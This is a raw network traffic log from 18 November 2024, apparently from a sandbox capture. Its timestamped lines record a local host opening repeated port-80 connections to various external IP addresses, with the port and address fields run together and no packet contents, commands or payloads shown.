                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:08.456232071 CET805006518.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:08.456585884 CET5006580192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:08.456629992 CET5006580192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:08.456629992 CET5006580192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:08.462723970 CET805006518.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:08.462743044 CET805006518.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.034887075 CET805006454.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.045774937 CET5006480192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.051287889 CET805006454.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.051364899 CET5006480192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.074249029 CET5006680192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.079216957 CET805006635.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.079329967 CET5006680192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.095609903 CET5006680192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.095609903 CET5006680192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.100675106 CET805006635.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.100714922 CET805006635.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.911253929 CET805006518.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.915406942 CET805006635.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.933975935 CET5006580192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.934187889 CET5006680192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.939429998 CET805006518.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.939554930 CET5006580192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.939784050 CET805006635.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.940135002 CET5006680192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.945691109 CET5006780192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.950958967 CET80500673.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.951029062 CET5006780192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.969805002 CET5006780192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.969827890 CET5006780192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.976205111 CET80500673.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.976495981 CET80500673.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.605551004 CET80500673.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.605809927 CET5006780192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.611099958 CET80500673.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.611157894 CET5006780192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.617548943 CET5006880192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.622492075 CET8050068165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.622592926 CET5006880192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.622685909 CET5006880192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.622700930 CET5006880192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.627826929 CET8050068165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.627847910 CET8050068165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.639834881 CET5006980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.645534992 CET805006913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.645828962 CET5006980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.647481918 CET5006980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.647644997 CET5006980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.652479887 CET805006913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.652602911 CET805006913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.355098009 CET8050068165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.358951092 CET5006880192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.358983040 CET5006880192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.364253044 CET8050068165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.364360094 CET8050068165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.536428928 CET8050068165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.590065002 CET5006880192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.090563059 CET805006913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.142589092 CET5006980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.216495037 CET5006980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.221997976 CET805006913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.222105980 CET5006980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.408133030 CET5007080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.413156033 CET805007054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.413266897 CET5007080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.413577080 CET5007080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.413577080 CET5007080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.418497086 CET805007054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.419373035 CET805007054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.673180103 CET5007180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.678133011 CET805007118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.678210974 CET5007180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.678416014 CET5007180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.678443909 CET5007180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.683754921 CET805007118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.683980942 CET805007118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.249610901 CET805007054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.258049965 CET5007080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.269354105 CET805007054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.269587994 CET5007080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.293462038 CET5005980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.293612003 CET5005980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.298625946 CET8050059208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.298655033 CET8050059208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.354842901 CET805007118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.382271051 CET5007180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.387842894 CET805007118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.390266895 CET5007180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.439344883 CET8050059208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.548918962 CET5005980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.548950911 CET5005980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.554105997 CET8050059208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.554260969 CET8050059208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.695333004 CET8050059208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.777576923 CET5005980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.946777105 CET8050059208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.947653055 CET5005980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.266021967 CET5007280192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.271260977 CET805007218.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.271348953 CET5007280192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.271732092 CET5007280192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.271754026 CET5007280192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.276725054 CET805007218.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.276861906 CET805007218.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.562007904 CET5007380192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.566893101 CET805007334.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.569719076 CET5007380192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.569719076 CET5007380192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.569819927 CET5007380192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.574692965 CET805007334.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.574723959 CET805007334.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.101429939 CET805007218.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.105593920 CET5007280192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.110966921 CET805007218.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.111641884 CET5007280192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.399615049 CET805007334.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.414515018 CET5007380192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.420041084 CET805007334.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.421910048 CET5007380192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.452985048 CET5007480192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.457961082 CET805007454.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.458034039 CET5007480192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.479372025 CET5007480192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.479401112 CET5007480192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.484529972 CET805007454.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.484915018 CET805007454.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.699027061 CET5007580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.704039097 CET805007544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.704133034 CET5007580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.710880041 CET5007580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.710902929 CET5007580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.715770960 CET805007544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.715929985 CET805007544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.299072027 CET805007454.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.299356937 CET5007480192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.306082964 CET805007454.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.306165934 CET5007480192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.312897921 CET5007680192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.318244934 CET805007618.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.318308115 CET5007680192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.318408012 CET5007680192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.318419933 CET5007680192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.323354006 CET805007618.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.323368073 CET805007618.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.360620022 CET805007544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.360815048 CET5007580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.366103888 CET805007544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.366177082 CET5007580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.731337070 CET5007780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.736442089 CET805007754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.736629009 CET5007780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.736795902 CET5007780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.737037897 CET5007780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.741636992 CET805007754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.741883993 CET805007754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.829994917 CET805007754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.830157042 CET805007754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.830166101 CET805007754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.830176115 CET805007618.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.830212116 CET5007780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.830358028 CET5007780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.831026077 CET5007680192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.110440016 CET805007754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.110455990 CET805007618.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.110491991 CET5007780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.110512972 CET5007680192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.110950947 CET805007754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.111305952 CET805007618.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.111417055 CET5007680192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.126454115 CET5007880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.131330013 CET805007818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.131402016 CET5007880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.131499052 CET5007880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.131511927 CET5007880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.136696100 CET805007818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.137021065 CET805007818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.312267065 CET5007980192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.317342997 CET80500793.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.317441940 CET5007980192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.317615032 CET5007980192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.317697048 CET5007980192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.322634935 CET80500793.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.322649002 CET80500793.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.799309969 CET805007818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.801548958 CET5007880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.807037115 CET805007818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.807180882 CET5007880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.025429964 CET5008080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.030529976 CET805008044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.033660889 CET5008080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.033890009 CET5008080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.033890009 CET5008080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.038893938 CET805008044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.039252043 CET805008044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.299871922 CET80500793.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.300071001 CET5007980192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.305680037 CET80500793.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.305749893 CET5007980192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.576273918 CET5008180192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.581252098 CET805008118.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.581331968 CET5008180192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.581500053 CET5008180192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.581500053 CET5008180192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.586344957 CET805008118.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.586369991 CET805008118.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.707056999 CET805008044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.732042074 CET5008080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.737730026 CET805008044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.737884998 CET5008080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.750235081 CET5008280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.757427931 CET805008218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.757508993 CET5008280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.757873058 CET5008280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.757896900 CET5008280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.762726068 CET805008218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.762737989 CET805008218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.045259953 CET805008118.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.046807051 CET5008180192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.052534103 CET805008118.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.053428888 CET5008180192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.229037046 CET805008218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.229516029 CET5008280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.237517118 CET805008218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.237606049 CET5008280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.437119007 CET5008380192.168.2.1018.246.231.120
